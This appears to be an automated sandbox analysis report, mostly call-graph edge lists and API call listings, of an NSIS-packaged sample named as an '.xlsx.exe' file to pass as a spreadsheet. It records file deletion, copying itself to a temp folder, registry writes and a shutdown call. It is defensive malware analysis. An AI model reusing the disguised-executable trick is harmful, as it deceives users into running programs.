4649->4563 4651 100015ad 4650->4651 4651->4587 4658 1000121b GlobalAlloc 4652->4658 4654 1000123b lstrcpynW 4654->4573 4655->4563 4656->4583 4657->4584 4658->4654 4660 100012c1 4659->4660 4661 1000122c 2 API calls 
4660->4661 4662 100012df 4661->4662 4662->4590 4664 100025e7 VirtualAlloc 4663->4664 4665 1000263d 4663->4665 4664->4665 4665->4599 4666->4624 4668 100012ea 4667->4668 4669 1000130c 4667->4669 4668->4669 4670 100012f0 lstrcpyW 4668->4670 4669->4624 4670->4669 4671->4632 5409 10001058 5411 10001074 5409->5411 5410 100010dd 5411->5410 5412 10001092 5411->5412 5413 10001516 GlobalFree 5411->5413 5414 10001516 GlobalFree 5412->5414 5413->5412 5415 100010a2 5414->5415 5416 100010b2 5415->5416 5417 100010a9 GlobalSize 5415->5417 5418 100010b6 GlobalAlloc 5416->5418 5420 100010c7 5416->5420 5417->5416 5419 1000153d 3 API calls 5418->5419 5419->5420 5421 100010d2 GlobalFree 5420->5421 5421->5410 5422 401718 5423 402b3a 18 API calls 5422->5423 5424 40171f SearchPathW 5423->5424 5425 40173a 5424->5425 4911 40159b 4912 402b3a 18 API calls 4911->4912 4913 4015a2 SetFileAttributesW 4912->4913 4914 4015b4 4913->4914 5426 40659d 5430 406421 5426->5430 5427 406d8c 5428 4064a2 GlobalFree 5429 4064ab GlobalAlloc 5428->5429 5429->5427 5429->5430 5430->5427 5430->5428 5430->5429 5430->5430 5431 406522 GlobalAlloc 5430->5431 5432 406519 GlobalFree 5430->5432 5431->5427 5431->5430 5432->5431 5433 40149e 5434 4014ac PostQuitMessage 5433->5434 5435 40223e 5433->5435 5434->5435 5436 4021a0 5437 402b3a 18 API calls 5436->5437 5438 4021a6 5437->5438 5439 402b3a 18 API calls 5438->5439 5440 4021af 5439->5440 5441 402b3a 18 API calls 5440->5441 5442 4021b8 5441->5442 5443 40628b 2 API calls 5442->5443 5444 4021c1 5443->5444 5445 4021d2 lstrlenW lstrlenW 5444->5445 5446 4021c5 5444->5446 5448 4051f2 25 API calls 5445->5448 5447 4051f2 25 API calls 5446->5447 5450 4021cd 5446->5450 5447->5450 5449 402210 SHFileOperationW 5448->5449 5449->5446 5449->5450 5451 100010e1 5460 10001111 5451->5460 5452 100011d8 GlobalFree 5453 100012ba 2 API calls 5453->5460 5454 100011d3 5454->5452 5455 100011f8 GlobalFree 5455->5460 5456 10001272 2 API calls 5459 100011c4 GlobalFree 5456->5459 5457 10001164 
GlobalAlloc 5457->5460 5458 100012e1 lstrcpyW 5458->5460 5459->5460 5460->5452 5460->5453 5460->5454 5460->5455 5460->5456 5460->5457 5460->5458 5460->5459 5461 401b22 5462 401b73 5461->5462 5463 401b2f 5461->5463 5464 401b78 5462->5464 5465 401b9d GlobalAlloc 5462->5465 5468 401b46 5463->5468 5471 401bb8 5463->5471 5477 40223e 5464->5477 5482 405f48 lstrcpynW 5464->5482 5467 405f6a 18 API calls 5465->5467 5466 405f6a 18 API calls 5469 402238 5466->5469 5467->5471 5480 405f48 lstrcpynW 5468->5480 5475 405724 MessageBoxIndirectW 5469->5475 5471->5466 5471->5477 5473 401b8a GlobalFree 5473->5477 5474 401b55 5481 405f48 lstrcpynW 5474->5481 5475->5477 5478 401b64 5483 405f48 lstrcpynW 5478->5483 5480->5474 5481->5478 5482->5473 5483->5477 5484 4029a2 SendMessageW 5485 4029c7 5484->5485 5486 4029bc InvalidateRect 5484->5486 5486->5485 4097 401924 4098 401926 4097->4098 4099 402b3a 18 API calls 4098->4099 4100 40192b 4099->4100 4103 4057d0 4100->4103 4142 405a9b 4103->4142 4106 4057f8 DeleteFileW 4108 401934 4106->4108 4107 40580f 4109 40592f 4107->4109 4156 405f48 lstrcpynW 4107->4156 4109->4108 4186 40628b FindFirstFileW 4109->4186 4111 405835 4112 405848 4111->4112 4113 40583b lstrcatW 4111->4113 4157 4059df lstrlenW 4112->4157 4115 40584e 4113->4115 4117 40585e lstrcatW 4115->4117 4119 405869 lstrlenW FindFirstFileW 4115->4119 4117->4119 4119->4109 4127 40588b 4119->4127 4120 405958 4189 405993 lstrlenW CharPrevW 4120->4189 4123 405912 FindNextFileW 4123->4127 4128 405928 FindClose 4123->4128 4124 405788 5 API calls 4126 40596a 4124->4126 4129 405984 4126->4129 4130 40596e 4126->4130 4127->4123 4136 4058d3 4127->4136 4161 405f48 lstrcpynW 4127->4161 4128->4109 4132 4051f2 25 API calls 4129->4132 4130->4108 4133 4051f2 25 API calls 4130->4133 4132->4108 4135 40597b 4133->4135 4134 4057d0 64 API calls 4134->4136 4138 405de2 40 API calls 4135->4138 4136->4123 4136->4134 4137 4051f2 25 API calls 4136->4137 4162 405788 4136->4162 4170 4051f2 4136->4170 4181 405de2 
4136->4181 4137->4123 4140 405982 4138->4140 4140->4108 4192 405f48 lstrcpynW 4142->4192 4144 405aac 4193 405a3e CharNextW CharNextW 4144->4193 4147 4057f0 4147->4106 4147->4107 4148 4061dc 5 API calls 4154 405ac2 4148->4154 4149 405af3 lstrlenW 4150 405afe 4149->4150 4149->4154 4152 405993 3 API calls 4150->4152 4151 40628b 2 API calls 4151->4154 4153 405b03 GetFileAttributesW 4152->4153 4153->4147 4154->4147 4154->4149 4154->4151 4155 4059df 2 API calls 4154->4155 4155->4149 4156->4111 4158 4059ed 4157->4158 4159 4059f3 CharPrevW 4158->4159 4160 4059ff 4158->4160 4159->4158 4159->4160 4160->4115 4161->4127 4199 405b8f GetFileAttributesW 4162->4199 4165 4057b5 4165->4136 4166 4057a3 RemoveDirectoryW 4168 4057b1 4166->4168 4167 4057ab DeleteFileW 4167->4168 4168->4165 4169 4057c1 SetFileAttributesW 4168->4169 4169->4165 4171 40520d 4170->4171 4180 4052af 4170->4180 4172 405229 lstrlenW 4171->4172 4173 405f6a 18 API calls 4171->4173 4174 405252 4172->4174 4175 405237 lstrlenW 4172->4175 4173->4172 4177 405265 4174->4177 4178 405258 SetWindowTextW 4174->4178 4176 405249 lstrcatW 4175->4176 4175->4180 4176->4174 4179 40526b SendMessageW SendMessageW SendMessageW 4177->4179 4177->4180 4178->4177 4179->4180 4180->4136 4202 4062b2 GetModuleHandleA 4181->4202 4185 405e0a 4185->4136 4187 4062a1 FindClose 4186->4187 4188 405954 4186->4188 4187->4188 4188->4108 4188->4120 4190 40595e 4189->4190 4191 4059af lstrcatW 4189->4191 4190->4124 4191->4190 4192->4144 4194 405a5b 4193->4194 4197 405a6d 4193->4197 4196 405a68 CharNextW 4194->4196 4194->4197 4195 405a91 4195->4147 4195->4148 4196->4195 4197->4195 4198 4059c0 CharNextW 4197->4198 4198->4197 4200 405ba1 SetFileAttributesW 4199->4200 4201 405794 4199->4201 4200->4201 4201->4165 4201->4166 4201->4167 4203 4062d9 GetProcAddress 4202->4203 4204 4062ce LoadLibraryA 4202->4204 4205 405de9 4203->4205 4204->4203 4204->4205 4205->4185 4206 405c66 lstrcpyW 4205->4206 4207 405cb5 GetShortPathNameW 4206->4207 4208 405c8f 4206->4208 
4210 405cca 4207->4210 4211 405ddc 4207->4211 4231 405bb4 GetFileAttributesW CreateFileW 4208->4231 4210->4211 4213 405cd2 wsprintfA 4210->4213 4211->4185 4212 405c99 CloseHandle GetShortPathNameW 4212->4211 4214 405cad 4212->4214 4215 405f6a 18 API calls 4213->4215 4214->4207 4214->4211 4216 405cfa 4215->4216 4232 405bb4 GetFileAttributesW CreateFileW 4216->4232 4218 405d07 4218->4211 4219 405d16 GetFileSize GlobalAlloc 4218->4219 4220 405dd5 CloseHandle 4219->4220 4221 405d38 4219->4221 4220->4211 4233 405c37 ReadFile 4221->4233 4226 405d57 lstrcpyA 4229 405d79 4226->4229 4227 405d6b 4228 405b19 4 API calls 4227->4228 4228->4229 4230 405db0 SetFilePointer WriteFile GlobalFree 4229->4230 4230->4220 4231->4212 4232->4218 4234 405c55 4233->4234 4234->4220 4235 405b19 lstrlenA 4234->4235 4236 405b5a lstrlenA 4235->4236 4237 405b62 4236->4237 4238 405b33 lstrcmpiA 4236->4238 4237->4226 4237->4227 4238->4237 4239 405b51 CharNextA 4238->4239 4239->4236 5487 402224 5488 40223e 5487->5488 5489 40222b 5487->5489 5490 405f6a 18 API calls 5489->5490 5491 402238 5490->5491 5492 405724 MessageBoxIndirectW 5491->5492 5492->5488 5500 402729 5501 402730 5500->5501 5502 4029c7 5500->5502 5503 402736 FindClose 5501->5503 5503->5502 5504 401cab 5505 402b1d 18 API calls 5504->5505 5506 401cb2 5505->5506 5507 402b1d 18 API calls 5506->5507 5508 401cba GetDlgItem 5507->5508 5509 4024e8 5508->5509 5510 4042ae lstrcpynW lstrlenW 5511 4016af 5512 402b3a 18 API calls 5511->5512 5513 4016b5 GetFullPathNameW 5512->5513 5514 4016cf 5513->5514 5515 4016f1 5513->5515 5514->5515 5518 40628b 2 API calls 5514->5518 5516 401706 GetShortPathNameW 5515->5516 5517 4029c7 5515->5517 5516->5517 5519 4016e1 5518->5519 5519->5515 5521 405f48 lstrcpynW 5519->5521 5521->5515 4265 405331 4266 405352 GetDlgItem GetDlgItem GetDlgItem 4265->4266 4267 4054dd 4265->4267 4311 4041cf SendMessageW 4266->4311 4269 4054e6 GetDlgItem CreateThread CloseHandle 4267->4269 4272 40550e 4267->4272 4269->4272 4314 4052c5 
OleInitialize 4269->4314 4270 4053c3 4277 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4270->4277 4271 405539 4275 405545 4271->4275 4276 405599 4271->4276 4272->4271 4273 405525 ShowWindow ShowWindow 4272->4273 4274 40555e 4272->4274 4313 4041cf SendMessageW 4273->4313 4281 404201 8 API calls 4274->4281 4279 405573 ShowWindow 4275->4279 4280 40554d 4275->4280 4276->4274 4286 4055a7 SendMessageW 4276->4286 4284 405439 4277->4284 4285 40541d SendMessageW SendMessageW 4277->4285 4282 405593 4279->4282 4283 405585 4279->4283 4287 404173 SendMessageW 4280->4287 4288 40556c 4281->4288 4290 404173 SendMessageW 4282->4290 4289 4051f2 25 API calls 4283->4289 4291 40544c 4284->4291 4292 40543e SendMessageW 4284->4292 4285->4284 4286->4288 4293 4055c0 CreatePopupMenu 4286->4293 4287->4274 4289->4282 4290->4276 4295 40419a 19 API calls 4291->4295 4292->4291 4294 405f6a 18 API calls 4293->4294 4296 4055d0 AppendMenuW 4294->4296 4297 40545c 4295->4297 4298 405600 TrackPopupMenu 4296->4298 4299 4055ed GetWindowRect 4296->4299 4300 405465 ShowWindow 4297->4300 4301 405499 GetDlgItem SendMessageW 4297->4301 4298->4288 4303 40561b 4298->4303 4299->4298 4304 405488 4300->4304 4305 40547b ShowWindow 4300->4305 4301->4288 4302 4054c0 SendMessageW SendMessageW 4301->4302 4302->4288 4306 405637 SendMessageW 4303->4306 4312 4041cf SendMessageW 4304->4312 4305->4304 4306->4306 4308 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4306->4308 4309 405679 SendMessageW 4308->4309 4309->4309 4310 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4309->4310 4310->4288 4311->4270 4312->4301 4313->4271 4315 4041e6 SendMessageW 4314->4315 4316 4052e8 4315->4316 4319 401389 2 API calls 4316->4319 4320 40530f 4316->4320 4317 4041e6 SendMessageW 4318 405321 OleUninitialize 4317->4318 4319->4316 4320->4317 5522 402331 5523 402337 5522->5523 5524 402b3a 18 API calls 5523->5524 5525 402349 5524->5525 5526 402b3a 18 API calls 5525->5526 5527 402353 RegCreateKeyExW 
5526->5527 5528 40237d 5527->5528 5530 402793 5527->5530 5529 402398 5528->5529 5531 402b3a 18 API calls 5528->5531 5532 402b1d 18 API calls 5529->5532 5535 4023a4 5529->5535 5534 40238e lstrlenW 5531->5534 5532->5535 5533 4023bf RegSetValueExW 5537 4023d5 RegCloseKey 5533->5537 5534->5529 5535->5533 5536 403062 46 API calls 5535->5536 5536->5533 5537->5530 5539 404635 5540 404661 5539->5540 5541 404672 5539->5541 5600 405708 GetDlgItemTextW 5540->5600 5542 40467e GetDlgItem 5541->5542 5549 4046dd 5541->5549 5544 404692 5542->5544 5548 4046a6 SetWindowTextW 5544->5548 5552 405a3e 4 API calls 5544->5552 5545 4047c1 5598 404955 5545->5598 5602 405708 GetDlgItemTextW 5545->5602 5546 40466c 5547 4061dc 5 API calls 5546->5547 5547->5541 5553 40419a 19 API calls 5548->5553 5549->5545 5554 405f6a 18 API calls 5549->5554 5549->5598 5551 404201 8 API calls 5556 404969 5551->5556 5557 40469c 5552->5557 5558 4046c2 5553->5558 5559 404751 SHBrowseForFolderW 5554->5559 5555 4047f1 5560 405a9b 18 API calls 5555->5560 5557->5548 5564 405993 3 API calls 5557->5564 5561 40419a 19 API calls 5558->5561 5559->5545 5562 404769 CoTaskMemFree 5559->5562 5563 4047f7 5560->5563 5565 4046d0 5561->5565 5566 405993 3 API calls 5562->5566 5603 405f48 lstrcpynW 5563->5603 5564->5548 5601 4041cf SendMessageW 5565->5601 5569 404776 5566->5569 5571 4047ad SetDlgItemTextW 5569->5571 5575 405f6a 18 API calls 5569->5575 5570 4046d6 5573 4062b2 3 API calls 5570->5573 5571->5545 5572 40480e 5574 4062b2 3 API calls 5572->5574 5573->5549 5582 404816 5574->5582 5576 404795 lstrcmpiW 5575->5576 5576->5571 5578 4047a6 lstrcatW 5576->5578 5577 404855 5604 405f48 lstrcpynW 5577->5604 5578->5571 5580 40485c 5581 405a3e 4 API calls 5580->5581 5583 404862 GetDiskFreeSpaceW 5581->5583 5582->5577 5586 4059df 2 API calls 5582->5586 5587 4048a7 5582->5587 5585 404885 MulDiv 5583->5585 5583->5587 5585->5587 5586->5582 5588 4049d6 21 API calls 5587->5588 5597 404904 5587->5597 5589 4048f6 5588->5589 5592 404906 
SetDlgItemTextW 5589->5592 5593 4048fb 5589->5593 5590 40140b 2 API calls 5591 404927 5590->5591 5605 4041bc KiUserCallbackDispatcher 5591->5605 5592->5597 5595 4049d6 21 API calls 5593->5595 5595->5597 5596 404943 5596->5598 5606 4045ca 5596->5606 5597->5590 5597->5591 5598->5551 5600->5546 5601->5570 5602->5555 5603->5572 5604->5580 5605->5596 5607 4045d8 5606->5607 5608 4045dd SendMessageW 5606->5608 5607->5608 5608->5598 5609 4028b6 5610 402b1d 18 API calls 5609->5610 5611 4028bc 5610->5611 5612 4028f8 5611->5612 5613 4028df 5611->5613 5617 402793 5611->5617 5614 402902 5612->5614 5615 40290e 5612->5615 5616 4028e4 5613->5616 5622 4028f5 5613->5622 5618 402b1d 18 API calls 5614->5618 5619 405f6a 18 API calls 5615->5619 5623 405f48 lstrcpynW 5616->5623 5618->5622 5619->5622 5622->5617 5624 405e8f wsprintfW 5622->5624 5623->5617 5624->5617 5625 404337 5626 40434f 5625->5626 5632 404469 5625->5632 5633 40419a 19 API calls 5626->5633 5627 4044d3 5628 4045a5 5627->5628 5629 4044dd GetDlgItem 5627->5629 5635 404201 8 API calls 5628->5635 5630 404566 5629->5630 5631 4044f7 5629->5631 5630->5628 5640 404578 5630->5640 5631->5630 5639 40451d 6 API calls 5631->5639 5632->5627 5632->5628 5636 4044a4 GetDlgItem SendMessageW 5632->5636 5634 4043b6 5633->5634 5637 40419a 19 API calls 5634->5637 5638 4045a0 5635->5638 5656 4041bc KiUserCallbackDispatcher 5636->5656 5642 4043c3 CheckDlgButton 5637->5642 5639->5630 5643 40458e 5640->5643 5644 40457e SendMessageW 5640->5644 5654 4041bc KiUserCallbackDispatcher 5642->5654 5643->5638 5648 404594 SendMessageW 5643->5648 5644->5643 5645 4044ce 5646 4045ca SendMessageW 5645->5646 5646->5627 5648->5638 5649 4043e1 GetDlgItem 5655 4041cf SendMessageW 5649->5655 5651 4043f7 SendMessageW 5652 404414 GetSysColor 5651->5652 5653 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5651->5653 5652->5653 5653->5638 5654->5649 5655->5651 5656->5645 5657 4014b8 5658 4014be 5657->5658 5659 401389 2 API calls 5658->5659 5660 
4014c6 5659->5660 4681 4015b9 4682 402b3a 18 API calls 4681->4682 4683 4015c0 4682->4683 4684 405a3e 4 API calls 4683->4684 4695 4015c9 4684->4695 4685 401614 4687 401646 4685->4687 4688 401619 4685->4688 4686 4059c0 CharNextW 4689 4015d7 CreateDirectoryW 4686->4689 4692 401423 25 API calls 4687->4692 4690 401423 25 API calls 4688->4690 4691 4015ed GetLastError 4689->4691 4689->4695 4693 401620 4690->4693 4691->4695 4696 4015fa GetFileAttributesW 4691->4696 4698 40163e 4692->4698 4699 405f48 lstrcpynW 4693->4699 4695->4685 4695->4686 4696->4695 4697 40162d SetCurrentDirectoryW 4697->4698 4699->4697 5661 401939 5662 402b3a 18 API calls 5661->5662 5663 401940 lstrlenW 5662->5663 5664 4024e8 5663->5664 5665 40293b 5666 402b1d 18 API calls 5665->5666 5667 402941 5666->5667 5668 402974 5667->5668 5669 402793 5667->5669 5671 40294f 5667->5671 5668->5669 5670 405f6a 18 API calls 5668->5670 5670->5669 5671->5669 5673 405e8f wsprintfW 5671->5673 5673->5669 5674 40683c 5676 406421 5674->5676 5675 406d8c 5676->5675 5677 4064a2 GlobalFree 5676->5677 5678 4064ab GlobalAlloc 5676->5678 5679 406522 GlobalAlloc 5676->5679 5680 406519 GlobalFree 5676->5680 5677->5678 5678->5675 5678->5676 5679->5675 5679->5676 5680->5679 4915 40173f 4916 402b3a 18 API calls 4915->4916 4917 401746 4916->4917 4918 405be3 2 API calls 4917->4918 4919 40174d 4918->4919 4920 405be3 2 API calls 4919->4920 4920->4919 5681 10002a7f 5682 10002a97 5681->5682 5683 1000158f 2 API calls 5682->5683 5684 10002ab2 5683->5684

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
[control_flow_graph 0: basic-block edge list for the function starting at 0040335A-004033F2 (entry block calls #17, SetErrorMode, OleInitialize, SHGetFileInfoW, GetCommandLineW and GetModuleHandleW; later blocks reach GetTempPathW, GetWindowsDirectoryW, DeleteFileW, CopyFileW, CreateDirectoryW, SetCurrentDirectoryW, ExitWindowsEx and ExitProcess), rendered as a graph in the original report]
                                                          APIs
                                                          • #17.COMCTL32 ref: 00403379
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • SHGetFileInfoW.SHELL32(004206A8,00000000,?,?,00000000), ref: 004033B3
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,?,004033C8,00428200,NSIS Error), ref: 00405F55
                                                          • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000), ref: 004033DB
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",?), ref: 00403403
                                                          • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                          • GetTempPathW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                          • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                          • OleUninitialize.OLE32(?), ref: 0040366C
                                                          • ExitProcess.KERNEL32 ref: 0040368C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000,?), ref: 00403698
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",00000000,?), ref: 004036A4
                                                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                          • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,0041FEA8,00000001), ref: 00403725
                                                          • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                          • GetCurrentProcess.KERNEL32(?,00000006,00000006,00000005,?), ref: 004037AC
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                          • ExitProcess.KERNEL32 ref: 00403827
                                                          Strings
                                                          Memory Dump Source
• Source File: 00000000.00000002.1591325527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1591308411.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1592057361.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1592599968.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1592599968.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1592599968.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1592599968.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1592599968.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1593749927.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                          Similarity
                                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                          • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Carfuffling$C:\Users\user\Desktop$C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                          • API String ID: 4107622049-820176954
                                                          • Opcode ID: 6de4bcbb11031c879ee3deef6446ea1c2af14a1e5999aba2ca839f213c8af4a3
                                                          • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                          • Opcode Fuzzy Hash: 6de4bcbb11031c879ee3deef6446ea1c2af14a1e5999aba2ca839f213c8af4a3
                                                          • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E

Control-flow Graph

Control-flow graph of the function at 0x405331 (rendered graph; node and edge listing not reproduced in text form)
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                          • GetClientRect.USER32(?,?), ref: 004053DC
                                                          • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                          • ShowWindow.USER32(?,?), ref: 00405480
                                                          • GetDlgItem.USER32(?,?), ref: 004054A1
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                          • GetDlgItem.USER32(?,?), ref: 004053AE
                                                            • Part of subcall function 004041CF: SendMessageW.USER32(?,?,00000001,00403FFB), ref: 004041DD
                                                          • GetDlgItem.USER32(?,?), ref: 004054F3
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                          • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                          • ShowWindow.USER32(00000000), ref: 0040552C
                                                          • ShowWindow.USER32(?,?), ref: 00405531
                                                          • ShowWindow.USER32(?), ref: 0040557B
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                          • CreatePopupMenu.USER32 ref: 004055C0
                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                          • GetWindowRect.USER32(?,?), ref: 004055F4
                                                          • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 0040560D
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                          • OpenClipboard.USER32(00000000), ref: 00405655
                                                          • EmptyClipboard.USER32 ref: 0040565B
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                          • CloseClipboard.USER32 ref: 004056B6
                                                          Strings
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: {$&B
                                                          • API String ID: 590372296-2518801558
                                                          • Opcode ID: c0326886d2318a88a78635f0047d6771461a0522e5dc035da93f56fe400bf1bd
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: c0326886d2318a88a78635f0047d6771461a0522e5dc035da93f56fe400bf1bd
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69

Control-flow Graph

Control-flow graph of the function at 0x405f6a (rendered graph; node and edge listing not reproduced in text form)
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(Call,?), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(Call,?), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsaCBA4.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-3587725775
                                                          • Opcode ID: 89a2242da9b4bbc605b67f2f009b40da19baa1a0849ba18391ac33b03fc270f4
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: 89a2242da9b4bbc605b67f2f009b40da19baa1a0849ba18391ac33b03fc270f4
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E

Control-flow Graph

Control-flow graph of the function at 0x4057d0 (rendered graph; node and edge listing not reproduced in text form)
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"), ref: 004057F9
